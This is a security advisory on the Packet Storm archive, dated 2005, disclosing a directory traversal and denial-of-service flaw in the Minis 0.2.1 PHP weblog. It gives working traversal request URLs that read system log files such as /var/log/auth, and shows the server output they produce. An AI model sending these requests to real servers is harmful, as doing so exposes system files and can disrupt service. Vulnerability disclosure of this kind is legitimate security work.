exploit the possibilities

MinisTraverse.txt

MinisTraverse.txt
Posted Jan 16, 2005
Authored by Madelman

Minis 0.2.1 suffers from a directory traversal flaw that allows for viewing of files outside of the webroot. If the server does not have access to the file, it enters into a loop causing a denial of service.

tags | exploit, denial of service
MD5 | d3aedc1d21e4c6f53b73e22762727c7d

MinisTraverse.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate

Summary:
- --------

(from vendor site: http://minis.sourceforge.net/)

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.

Minis doesn't check the month parameter which allows reading any file with
.log extension

This vulnerability has been tested with Minis 0.2.1


Details:
- --------

If we want to read /var/log/XFree86.0.log:

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This
is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.
Bugs may be reported to XFree86@XFree86.Org and patches submitted
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to
fixes@XFree86.Org. Before reporting bugs in pre-release versions,
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please
check the latest version in the XFree86 CVS repository
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root@cyberhq.internal.cyberhqz.com)
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X
Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build
Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build
Date: 29 May 2004
[...]

If we try to read a file that doesn't exist (in this example
/var/log/XFree86.log) Minis returns "No such month"

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.


If we try to read a file the webserver doesn't have autorization to, Minis
enters an endless loop which
could cause an incredible amount of bandwith spent by the server or even a
DoS

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to
open stream: Permission denied in /var/www/minis/minis.php on line 109

../../../../../../../../var/log/auth

Warning: feof(): supplied argument is not a valid stream resource in
/var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in
/var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in
/var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in
/var/www/minis/minis.php on line 112
[...]


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close